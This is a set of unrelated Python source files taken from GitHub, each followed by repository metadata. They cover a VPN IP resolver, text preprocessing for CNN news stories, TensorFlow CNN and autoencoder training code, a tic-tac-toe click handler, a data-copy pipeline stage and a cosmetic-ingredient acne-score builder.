class VPNResolve(object):
def __init__( self, cidr, dbcfg):
self.logscollection = dbcfg['logscollection']
self.devicecollection = dbcfg['devicecollection']
self.db = dbcfg['db']
self.cidr = cidr
self.mc = MongoClient(dbcfg['host'], dbcfg['port'])
def clientip(self, request):
if len(request.access_route) > 1:
host = request.access_route[-1]
else:
host = request.access_route[0]
logger.debug("seen a client ip %s" % host)
if IPAddress(host) not in IPNetwork(self.cidr):
logger.debug("is not local, looking up in openvpn status")
return self.findlocal(host)
else:
return host
def findlocal(self, host):
db = self.mc[self.db]
devices = db[self.logscollection].find({"untrusted_client_ip": host}).sort("ts", -1).limit(1)
devicename = None
protocol = None
for device in devices:
devicename = device['common_name']
protocol = device['proto']
#now lookup device name in the devices collection
device = db[self.devicecollection].find_one({"login":devicename})
if device is not None:
if protocol is not None:
if protocol == "udp":
if 'vpn_udp_ip' in device:
logger.debug("retreived udp ip %s" % device['vpn_udp_ip'])
return device['vpn_udp_ip']
elif protocol == "tcp":
if 'vpn_tcp_ip' in device:
logger.debug("retreived tcp ip %s" % device['vpn_tcp_ip'])
return device['vpn_tcp_ip']
logger.debug("no corresponding ip for %s in db" % host)
return None
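# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal, hedged example of wiring VPNResolve up. Every value in dbcfg below
# (host, port, db and collection names) and the CIDR are placeholder assumptions;
# a reachable MongoDB holding openvpn status logs is needed for findlocal() to
# return anything useful.
if __name__ == "__main__":
    dbcfg = {
        "host": "localhost",
        "port": 27017,
        "db": "ucn",
        "logscollection": "vpnlogs",
        "devicecollection": "devices",
    }
    resolver = VPNResolve("10.8.0.0/24", dbcfg)
    print(resolver.findlocal("203.0.113.7"))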
|
ucn-eu/ucnviz
|
vpnresolve.py
|
vpnresolve.py
|
py
| 1,620 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39629119175
|
import numpy as np
import glob
import os
import pandas as pd
from tqdm import tqdm
import nltk
import string
from nltk.tokenize import word_tokenize
import random
import pickle
from nltk.corpus import stopwords
from autocorrect import Speller
import re
from nltk.corpus import wordnet
from nltk.stem.wordnet import WordNetLemmatizer
from hyperopt import fmin, tpe, hp
# load a document
def load(filename):
file = open(filename, encoding='utf-8')
text = file.read()
file.close()
return text
# split a document into news story and highlights
def split(doc):
# find first highlight
index = doc.find('@highlight')
# split into story and highlights
story, highlights = doc[:index], doc[index:].split('@highlight')
# strip extra white space around each highlight
highlights = [h.strip() for h in highlights if len(h) > 0]
return story, highlights
# load all stories from a directory
def load_stories(directory):
stories = []
for name in os.listdir(directory):
filename = directory + '/' + name
# load document
doc = load(filename)
# split into story and highlights
story, highlights = split(doc)
# store
stories.append({'story':story, 'highlights':highlights})
return stories
directory = r'C:\Users\ymaha\Desktop\cnn\stories'
stories = load_stories(directory)
print('Loaded Stories %d' % len(stories))
def preprocessing(lines):
# function to convert nltk tag to wordnet tag
def nltk_tag_to_wordnet_tag(nltk_tag):
if nltk_tag.startswith('J'):
return wordnet.ADJ
elif nltk_tag.startswith('V'):
return wordnet.VERB
elif nltk_tag.startswith('N'):
return wordnet.NOUN
elif nltk_tag.startswith('R'):
return wordnet.ADV
else:
return None
def lemmatize_sentence(sentence):
#tokenize the sentence and find the POS tag for each token
nltk_tagged = nltk.pos_tag(nltk.word_tokenize(sentence))
#tuple of (token, wordnet_tag)
wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)
# print(wordnet_tagged)
lemmatized_sentence = []
for word, tag in wordnet_tagged:
if tag is None:
#if there is no available tag, append the token as is
lemmatized_sentence.append(word)
else:
#else use the tag to lemmatize the token
lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))
# if tag is not None:
# lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))
return " ".join(lemmatized_sentence)
temp = []
for line in lines:
# strip source cnn
index = line.find('(CNN)')
if index > -1:
line = line[index+len('(CNN)'):]
# tokenize on white space
line = line.split()
# convert to lower case
line = [word.lower() for word in line]
# remove punctuation and special characters from each token
# (str.replace treats the pattern literally, so use re.sub for the regex)
line = [re.sub(r'[<>!#@$:.,%?\-_]+', ' ', w) for w in line]
# remove non ascii characters
line = [re.sub(r'[^\x00-\x7f]', ' ', w) for w in line]
# remove tokens with numbers in them
line = [word for word in line if word.isalpha()]
# # removing stop words
# line = [word for word in line if word not in stop_list]
# removing words of length 1
line = [word for word in line if len(word) > 1]
# # Lemmatizing the words and combing them into a line
# temp.append(lemmatize_sentence(' '.join(line)))
# Combining the words into a line
temp.append(' '.join(line))
# remove empty strings
temp = [c for c in temp if len(c) > 0]
return temp
stop_list = stopwords.words('english')
lemmatizer = WordNetLemmatizer()
stemmer = nltk.stem.PorterStemmer()
for i in tqdm(range(len(stories))):
# for example in stories:
stories[i]['story'] = preprocessing(stories[i]['story'].split('\n'))
stories[i]['highlights'] = preprocessing(stories[i]['highlights'])
# save to file
from pickle import dump
dump(stories, open('processed_cnn_data.pkl', 'wb'))
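# --- Usage sketch (added for illustration) ---
# A small, hedged example of reading back the pickle written above and
# inspecting one processed story; it only assumes the file produced by dump().
from pickle import load
with open('processed_cnn_data.pkl', 'rb') as f:
    processed = load(f)
print(len(processed), 'stories reloaded')
print(processed[0]['highlights'][:2])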
|
kalyankumarp/Abstractive-Text-Summarization-using-Transformers
|
Models/preprocess.py
|
preprocess.py
|
py
| 4,310 |
python
|
en
|
code
| 3 |
github-code
|
6
|
42479631473
|
"""Unsupervised Model scheleton."""
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from yadlt.core.model import Model
from yadlt.utils import tf_utils
class UnsupervisedModel(Model):
"""Unsupervised Model scheleton class.
The interface of the class is sklearn-like.
Methods
-------
* fit(): model training procedure.
* transform(): model inference procedure.
* reconstruct(): model reconstruction procedure (autoencoders).
* score(): model scoring procedure (mean error).
"""
def __init__(self, name):
"""Constructor."""
Model.__init__(self, name)
def fit(self, train_X, train_Y=None, val_X=None, val_Y=None, graph=None):
"""Fit the model to the data.
Parameters
----------
train_X : array_like, shape (n_samples, n_features)
Training data.
train_Y : array_like, shape (n_samples, n_features)
Training reference data.
val_X : array_like, shape (N, n_features) optional, (default = None).
Validation data.
val_Y : array_like, shape (N, n_features) optional, (default = None).
Validation reference data.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object.
Returns
-------
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
# Build model
self.build_model(train_X.shape[1])
with tf.Session() as self.tf_session:
# Initialize tf stuff
summary_objs = tf_utils.init_tf_ops(self.tf_session)
self.tf_merged_summaries = summary_objs[0]
self.tf_summary_writer = summary_objs[1]
self.tf_saver = summary_objs[2]
# Train model
self._train_model(train_X, train_Y, val_X, val_Y)
# Save model
self.tf_saver.save(self.tf_session, self.model_path)
def transform(self, data, graph=None):
"""Transform data according to the model.
Parameters
----------
data : array_like, shape (n_samples, n_features)
Data to transform.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object
Returns
-------
array_like, transformed data
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {self.input_data: data, self.keep_prob: 1}
return self.encode.eval(feed)
def reconstruct(self, data, graph=None):
"""Reconstruct data according to the model.
Parameters
----------
data : array_like, shape (n_samples, n_features)
Data to transform.
graph : tf.Graph, optional (default = None)
Tensorflow Graph object
Returns
-------
array_like, transformed data
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {self.input_data: data, self.keep_prob: 1}
return self.reconstruction.eval(feed)
def score(self, data, data_ref, graph=None):
"""Compute the reconstruction loss over the test set.
Parameters
----------
data : array_like
Data to reconstruct.
data_ref : array_like
Reference data.
Returns
-------
float: Mean error.
"""
g = graph if graph is not None else self.tf_graph
with g.as_default():
with tf.Session() as self.tf_session:
self.tf_saver.restore(self.tf_session, self.model_path)
feed = {
self.input_data: data,
self.input_labels: data_ref,
self.keep_prob: 1
}
return self.cost.eval(feed)
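# --- Usage sketch (added for illustration; not part of the original module) ---
# A hedged outline of the sklearn-like call pattern described in the class
# docstring. "SomeAutoencoder" is a placeholder for any concrete subclass that
# implements build_model() and _train_model(); X_train / X_test are assumed to
# be numpy arrays of shape (n_samples, n_features).
#
#   model = SomeAutoencoder(name="ae")    # concrete subclass of UnsupervisedModel
#   model.fit(X_train)                    # trains and saves a checkpoint
#   codes = model.transform(X_test)       # encoded representation
#   recon = model.reconstruct(X_test)     # reconstruction
#   err = model.score(X_test, X_test)     # mean reconstruction error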
|
gabrieleangeletti/Deep-Learning-TensorFlow
|
yadlt/core/unsupervised_model.py
|
unsupervised_model.py
|
py
| 4,251 |
python
|
en
|
code
| 965 |
github-code
|
6
|
11545903852
|
import modules.processing_turn as m_turn
import modules.data_base as m_data
def click_cell(x,y):
# Condition: first row of the board
if y < 100 and y > 0:
# Condition: first cell along x
if x > -100 and x < 0 and m_data.list_cells[0] == 0:
m_turn.who_turn(-100, 100, 0)
# Condition: second cell along x
elif x < 100 and x > 0 and m_data.list_cells[1] == 0:
m_turn.who_turn(0, 100, 1)
# Condition: third cell along x
elif x > 100 and x < 200 and m_data.list_cells[2] == 0:
m_turn.who_turn(100, 100, 2)
# Condition: second row of the board
elif y < 0 and y > -100:
# Condition: fourth cell along x
if x > -100 and x < 0 and m_data.list_cells[3] == 0:
m_turn.who_turn(-100, 0, 3)
# Condition: fifth cell along x
elif x < 100 and x > 0 and m_data.list_cells[4] == 0:
m_turn.who_turn(0, 0, 4)
# Condition: sixth cell along x
elif x > 100 and x < 200 and m_data.list_cells[5] == 0:
m_turn.who_turn(100, 0, 5)
# Condition: third row of the board
elif y < -100 and y > -200:
if x > -100 and x < 0 and m_data.list_cells[6] == 0:
m_turn.who_turn(-100,-100,6)
elif x < 100 and x > 0 and m_data.list_cells[7] == 0:
m_turn.who_turn(0, -100, 7)
elif x > 100 and x < 200 and m_data.list_cells[8] == 0:
m_turn.who_turn(100, -100, 8)
|
BoiarkinaOryna/cross_zero_game
|
modules/checking_square_coordinates.py
|
checking_square_coordinates.py
|
py
| 1,655 |
python
|
uk
|
code
| 0 |
github-code
|
6
|
10701337998
|
import tensorflow as tf
import re
import time, datetime
import os
import data_helper
TOWER_NAME = 'tower'
class CNNClassify(object):
"""CNN图像分类
"""
def __init__(self, batch_size, num_classes, num_train_examples, initial_lr=0.1, lr_decay_factor=0.1,
moving_average_decay=0.9999, num_epochs_per_decay=300, log_frequency=10,
max_steps=200000, checkpoint_every=5000, num_gpus=4, session_conf=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True,
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.3))):
self.batch_size = batch_size
self.num_classes = num_classes
self.moving_average_decay = moving_average_decay # 用于移动平均的衰减
self.initial_lr = initial_lr # 最初的学习速率
self.lr_decay_factor = lr_decay_factor # 学习速率衰减因子
self.num_epochs_per_decay = num_epochs_per_decay # 多少轮衰减一次
self.num_train_examples = num_train_examples # 训练样本数量
self.log_frequency = log_frequency # 多少步控制台打印一次结果
self.max_steps = max_steps
self.checkpoint_every = checkpoint_every # 多少步之后保存一次模型
self.num_checkpoints = 5
self.num_gpus = num_gpus
self.session_conf = session_conf
def _variable_on_cpu(self, name, shape, initializer):
"""帮助创建存储在CPU内存上的变量。"""
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(self, name, shape, stddev, wd):
"""初始化权重变量
Args:
name: name of the variable
shape: list of ints
stddev: 高斯函数标准差
wd: 添加L2范数损失权重衰减系数。如果没有,该变量不添加重量衰减。
Returns:权重变量
"""
dtype = tf.float32
var = self._variable_on_cpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def _activation_summary(self, x):
"""创建tensorboard摘要 好可视化查看
"""
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.summary.histogram(tensor_name + '/activations', x)
tf.summary.scalar(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def average_gradients(self, tower_grads):
"""计算所有tower上所有变量的平均梯度
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Each (gradient, variable) entry looks like this:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add a leading 0th dimension to represent the tower: [grad0_gpuN]
expanded_g = tf.expand_dims(g, 0)
# [[grad0_gpu1],...,[grad0_gpuN]]
grads.append(expanded_g)
# Average over the towers: the extra dimension lets us concat the per-tower gradients along axis 0 and take the mean
grad = tf.concat(axis=0, values=grads) # [grad0_gpu1,..., grad0_gpuN]
grad = tf.reduce_mean(grad, 0) # averaged gradient
# Re-attach the variable to the averaged gradient
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def inference(self, images):
"""向前传播
"""
# 第一层卷积
with tf.variable_scope('conv1') as scope:
kernel = self._variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0) # 权值矩阵
# 二维卷积
conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME') # 周围补0 保持形状不变
biases = self._variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(pre_activation, name=scope.name) # relu激活
self._activation_summary(conv1)
# pool1 最大池化
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
# norm1 增加一个LRN处理,可以增强模型的泛化能力
norm1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
# 第二层卷积
with tf.variable_scope('conv2') as scope:
kernel = self._variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(norm1, kernel, [1, 1, 1, 1], padding='SAME')
biases = self._variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
pre_activation = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(pre_activation, name=scope.name)
self._activation_summary(conv2)
# this time apply LRN first
norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
# max pooling
pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
# fully connected hidden layer that maps to a 384-dim vector
with tf.variable_scope('local3') as scope:
# flatten the max-pool output into a single matrix for the fully connected layer
reshape = tf.reshape(pool2, [self.batch_size, -1])
dim = reshape.get_shape()[1].value
weights = self._variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
biases = self._variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
self._activation_summary(local3)
# another fully connected layer that maps to a 192-dim vector
with tf.variable_scope('local4') as scope:
weights = self._variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
biases = self._variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
self._activation_summary(local4)
# linear output layer; no softmax here because it is applied inside the loss function, which is more efficient
with tf.variable_scope('softmax_linear') as scope:
weights = self._variable_with_weight_decay('weights', [192, self.num_classes], stddev=1 / 192.0, wd=0.0)
biases = self._variable_on_cpu('biases', [self.num_classes], tf.constant_initializer(0.0))
softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
self._activation_summary(softmax_linear)
return softmax_linear
def loss(self, logits, labels):
"""损失函数
"""
# Calculate the average cross entropy loss across the batch.
labels = tf.cast(labels, tf.int64)
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
tf.add_to_collection('losses', cross_entropy_mean)
# The total loss is defined as the cross entropy loss plus all of the weight
# decay terms (L2 loss).
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def tower_loss(self, scope, logits, labels):
_ = self.loss(logits, labels)
# gather all losses for the current tower
losses = tf.get_collection('losses', scope)
total_loss = tf.add_n(losses, name='total_loss')
for l in losses + [total_loss]:
# strip the tower_[0-9] prefix from the name so it matches the single-GPU case
loss_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', l.op.name)
tf.summary.scalar(loss_name, l)
return total_loss
def evaluation(self, logits, labels, k=1):
"""Evaluation function
:param logits: predictions
:param labels: ground-truth labels
"""
correct = tf.nn.in_top_k(logits, labels, k=k)
# correct = tf.equal(self.predictions, tf.argmax(labels, 1))
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))
tf.add_to_collection('accuracy', accuracy)
return tf.add_n(tf.get_collection('accuracy'), name='accuracy')
def tower_evaluation(self, scope, logits, labels, k=1):
"""多gpu的评估函数
"""
_ = self.evaluation(logits, labels, k)
accuracy = tf.get_collection('accuracy', scope)
total_accuracy = tf.reduce_mean(accuracy, axis=0, name='total_accuracy')
return total_accuracy
def _add_loss_summaries(self, total_loss):
"""增加损失摘要
"""
# Compute the moving average of all individual losses and the total loss.
loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
losses = tf.get_collection('losses')
loss_averages_op = loss_averages.apply(losses + [total_loss])
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
# Name each loss as '(raw)' and name the moving average version of the loss
# as the original loss name.
tf.summary.scalar(l.op.name + ' (raw)', l)
tf.summary.scalar(l.op.name, loss_averages.average(l))
return loss_averages_op
def train_operation(self, total_loss, global_step):
"""训练操作
"""
num_batches_per_epoch = self.num_train_examples / self.batch_size # 每轮的批次数
decay_steps = int(num_batches_per_epoch * self.num_epochs_per_decay) # 多少步衰减
# 基于步数,以指数方式衰减学习率。
lr = tf.train.exponential_decay(self.initial_lr, global_step, decay_steps, self.lr_decay_factor, staircase=True)
tf.summary.scalar('learning_rate', lr)
# moving average of the losses
loss_averages_op = self._add_loss_summaries(total_loss)
with tf.control_dependencies([loss_averages_op]):
opt = tf.train.GradientDescentOptimizer(lr) # optimizer
grads = opt.compute_gradients(total_loss) # gradients
# apply the gradients
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step) # training op
# add histograms for the trainable variables
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name, var)
# add histograms for the gradients
for grad, var in grads:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
# track moving averages of all trainable variables
variable_averages = tf.train.ExponentialMovingAverage(self.moving_average_decay, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
with tf.control_dependencies([apply_gradient_op, variables_averages_op]):
train_op = tf.no_op(name='train')
return train_op
def train_step(self, sess, summary_writer):
"""单步训练
"""
_, step, cur_loss, cur_acc = sess.run([self.train_op, self.global_step, self._loss, self.accuracy])
time_str = datetime.datetime.now().isoformat()
print("{}: step {}, loss {:g}, acc {:g}".format(time_str, step, cur_loss, cur_acc))
# 存储摘要
if step % 100 == 0:
summary_str = sess.run(self.summary)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
def train(self, filename, out_dir):
"""训练
"""
with tf.Graph().as_default():
sess = tf.Session(config=self.session_conf)
with sess.as_default():
self.global_step = tf.contrib.framework.get_or_create_global_step()
with tf.device('/cpu:0'):
images, labels = data_helper.distorted_inputs(filename, self.batch_size)
logits = self.inference(images)
self._loss = self.loss(logits, labels)
self.train_op = self.train_operation(self._loss, self.global_step)
self.accuracy = self.evaluation(logits, labels)
self.summary = tf.summary.merge_all()
# checkpoint setup
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model") # prefix for saved model files
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.num_checkpoints)
summary_writer = tf.summary.FileWriter(out_dir + "/summary", sess.graph)
# initialize all variables
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
tf.train.start_queue_runners(sess=sess)
for step in range(self.max_steps):
self.train_step(sess, summary_writer) # train
cur_step = tf.train.global_step(sess, self.global_step)
# save the model every checkpoint_every iterations
if cur_step % self.checkpoint_every == 0 and cur_step != 0:
path = saver.save(sess, checkpoint_prefix, global_step=cur_step)
print("Saved model checkpoint to {}\n".format(path))
def multi_gpu_train(self, filename, out_dir):
with tf.Graph().as_default(), tf.device('/cpu:0'):
sess = tf.Session(config=self.session_conf)
with sess.as_default():
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
self.global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
# learning-rate decay settings
num_batches_per_epoch = self.num_train_examples / self.batch_size
decay_steps = int(num_batches_per_epoch * self.num_epochs_per_decay)
# decay the learning rate based on the global step
lr = tf.train.exponential_decay(self.initial_lr, self.global_step, decay_steps, self.lr_decay_factor,
staircase=True)
# optimizer that performs gradient descent
opt = tf.train.GradientDescentOptimizer(lr)
images, labels = data_helper.distorted_inputs(filename, self.batch_size) # load the data
# batch queue that prefetches batches for the GPU towers
batch_queue = tf.contrib.slim.prefetch_queue.prefetch_queue([images, labels], capacity=2 * self.num_gpus)
tower_grads = []
summaries = None
with tf.variable_scope(tf.get_variable_scope()):
for i in range(self.num_gpus):
with tf.device('/gpu:{}'.format(i)):
with tf.name_scope('{}_{}'.format(TOWER_NAME, i)) as scope:
# dequeue one batch for this GPU
image_batch, label_batch = batch_queue.dequeue()
# compute the loss for one tower; all towers share the weight variables
logits = self.inference(image_batch)
self._loss = self.tower_loss(scope, logits, label_batch)
self.accuracy = self.tower_evaluation(scope, logits, label_batch)
# reuse the variables for the next tower
tf.get_variable_scope().reuse_variables()
# keep the summaries from the final tower
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
# compute the gradients
grads = opt.compute_gradients(self._loss)
# collect the gradients from all towers
tower_grads.append(grads)
grads = self.average_gradients(tower_grads) # averaged gradients
# add a summary for the learning rate
summaries.append(tf.summary.scalar('learning_rate', lr))
# add gradient histograms
for grad, var in grads:
if grad is not None:
summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))
# apply the gradients to update the shared variables
apply_gradient_op = opt.apply_gradients(grads, global_step=self.global_step)
# add histograms for all trainable variables
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram(var.op.name, var))
# track moving averages of all trainable variables
variable_averages = tf.train.ExponentialMovingAverage(self.moving_average_decay, self.global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
# group all updates into a single training op
self.train_op = tf.group(apply_gradient_op, variables_averages_op)
# merge the summaries from the last tower
self.summary = tf.summary.merge(summaries)
# checkpoint setup
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model") # prefix for saved model files
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.num_checkpoints)
summary_writer = tf.summary.FileWriter(out_dir + "/summary", sess.graph)
# initialize all variables
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
# start the queue runners
tf.train.start_queue_runners(sess=sess)
for step in range(self.max_steps):
self.train_step(sess, summary_writer) # train
cur_step = tf.train.global_step(sess, self.global_step)
# save the model every checkpoint_every iterations
if cur_step % self.checkpoint_every == 0 and cur_step != 0:
path = saver.save(sess, checkpoint_prefix, global_step=cur_step)
print("Saved model checkpoint to {}\n".format(path))
|
mikuh/tf_code
|
cnn/cnn_model.py
|
cnn_model.py
|
py
| 19,630 |
python
|
en
|
code
| 3 |
github-code
|
6
|
26807586503
|
from src.utils.all_utils import read_yaml, create_directory
import argparse
import os
import shutil
from tqdm import tqdm
import logging
log_string = "[%(asctime)s: %(levelname)s: %(module)s]: %(message)s"
logs_dir = "Logs"
os.makedirs(logs_dir,exist_ok=True)
logging.basicConfig(filename=os.path.join(logs_dir,"Running_Logs.log"),level=logging.INFO,format=log_string,filemode='a')
def copy_file(source_download_dir,local_data_dir):
source_files = os.listdir(source_download_dir)
N = len(source_files)
for file in tqdm(source_files,total=N,desc= f"Copying File from {source_download_dir} to {local_data_dir}", colour="green"):
src = os.path.join(source_download_dir,file)
dst = os.path.join(local_data_dir,file)
shutil.copy(src, dst)
def get_data(config_path):
config = read_yaml(config_path)
source_download_dirs = config["source_download_dirs"]
local_data_dirs = config["local_data_dirs"]
for source_download_dir,local_data_dir in tqdm(zip(source_download_dirs,local_data_dirs),total=2,desc= "List of Folders", colour="cyan"):
create_directory([local_data_dir])
copy_file(source_download_dir,local_data_dir)
if __name__ == '__main__':
args = argparse.ArgumentParser()
args.add_argument("--config", "-c", default="config/config.yaml")
parsed_args = args.parse_args()
try:
logging.info(">>>>>Stage-01 Started...")
get_data(config_path=parsed_args.config)
logging.info("Stage-01 Completed , Data saved into local Directory <<<<<<\n")
except Exception as e:
raise e
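# --- Config sketch (added for illustration) ---
# get_data() only reads the two keys below from config.yaml; read_yaml() is
# expected to return a mapping shaped like this placeholder (the directory
# names are assumptions, not the project's actual layout).
example_config = {
    "source_download_dirs": ["data/source/class_a", "data/source/class_b"],
    "local_data_dirs": ["data/local/class_a", "data/local/class_b"],
}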
|
vicharapubhargav/dvc_tensorflow_demo
|
src/stage_01_load_save.py
|
stage_01_load_save.py
|
py
| 1,595 |
python
|
en
|
code
| 0 |
github-code
|
6
|
715415024
|
import pandas as pd
import pickle
def buildDataSet():
#Import Ingredients DF
print('Loaded Products...')
ewg_ing_df = pd.read_json('ingredients_products_keys_fixed/ewg_ingredients.json', orient = 'index')
#Build mapping between Ingredient ID and ingredient Name
ing_map = {}
for i in range(len(ewg_ing_df)):
ID = ewg_ing_df.iloc[i]['ingredient_id']
name = ewg_ing_df.iloc[i]['ingredient_name']
ing_map[ID] = name
#Read in Product Data and Initialize Acne Score
ewg_prd_df = pd.read_json('ingredients_products_keys_fixed/ewg_products.json', orient = 'index')
ewg_prd_df['Acne_Score'] = 0
print('Loaded ingredients')
#Build Lists of ingredients to modify original DataFrame and Initialize Dataset for Model
from collections import Counter
n = len(ewg_prd_df)
ing_lists = []
ing_cnts = Counter()
string_lists = []
for i in range(n):
try:
new_list = []
strings = ''
ing_list = ewg_prd_df.iloc[i]['ingredient_list']
for ID in ing_list:
new_list.append(ing_map[ID])
ing_cnts[ing_map[ID]] += 1
#strings = strings + ' ' + ing_map[ID]
#print(new_list)
ing_lists.append(new_list)
string_lists.append(str(new_list))
except:
ing_lists.append([''])
string_lists.append('')
print('Failed on',i, 'no ingredient list.')
print('Finished matching ingredients to keys.')
ewg_prd_df['New_List'] = ing_lists
#Build Synonym Dictionary
synonym_dict = {}
for i in range(ewg_ing_df.shape[0]):
row = ewg_ing_df.iloc[i]
syns = row['synonym_list']
if type(syns) == list:
for syn in syns:
synonym_dict[syn.strip()] = row['ingredient_name']
synonym_dict[row['ingredient_name']] = row['ingredient_name']
else:
synonym_dict[row['ingredient_name']] = row['ingredient_name']
print('Build Synonyms')
#Initialize Ingredient Score
ewg_ing_df['Acne_Score'] = 0.0
#Extract Comodegenic Scores
comodegenic = []
with open('comodegenic.csv','r') as f:
for line in f:
if line[0] != ',':
words = line.strip().split(',')
if words[1] != '':
comodegenic.append(( words[0], words[1], words[2]))
cd_df = pd.DataFrame(comodegenic)
#Match Comodegeic Ingredients to EWG
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
matches = []
print('Matching Comodegenic to EWG...')
for i in range(cd_df.shape[0]):
cur_ingredient = cd_df.iloc[i][0].upper()
matches.append(process.extract(cur_ingredient, synonym_dict.keys(),limit=1, scorer=fuzz.token_sort_ratio))
#Match Comodegenic Ingredients to EWG
cd_ranks = []
for i in range(cd_df.shape[0]):
match_score = int(matches[i][0][1])
match_name = matches[i][0][0]
cd_name = cd_df.iloc[i][0].upper()
cd_ranks.append(match_score)
if match_score >= 90:
ewg_name = synonym_dict[match_name]
#print(temp_score, '\t', match_name, '\t', cd_name, '\t', synonym_dict[match_name])
#print(cd_df.iloc[i][1],cd_df.iloc[i][0])
row= ewg_ing_df[ewg_ing_df['ingredient_name']==ewg_name].index
ewg_ing_df.loc[row,'Acne_Score'] = cd_df.iloc[i][1]
#print(ewg_ing_df.loc[row]['ingredient_name'], ewg_ing_df.loc[row]['Acne_Score'])
#print(ewg_ing_df[ewg_ing_df['ingredient_name']==ewg_name])
print('Updated EWG with Acne Scores')
#Update Product Acne Score
acne_score_list = []
for i in range(ewg_prd_df.shape[0]):
row = ewg_prd_df.iloc[i]
total_acne = 0
for ing in row['New_List']:
try:
acne_score = float(ewg_ing_df[ewg_ing_df['ingredient_name']==ing]['Acne_Score'])
#print(ing, acne_score)
total_acne += acne_score
except:
None
acne_score_list.append(total_acne)
#print(acne_score_list)
ewg_prd_df['Acne_Score'] = acne_score_list
#Save Final Acne Matrix
pickle_out = open("ewg_prd_df.pickle","wb")
pickle.dump(ewg_prd_df, pickle_out)
pickle_out.close()
print('Saved dataset to "ewg_prd_df.pickle"')
try:
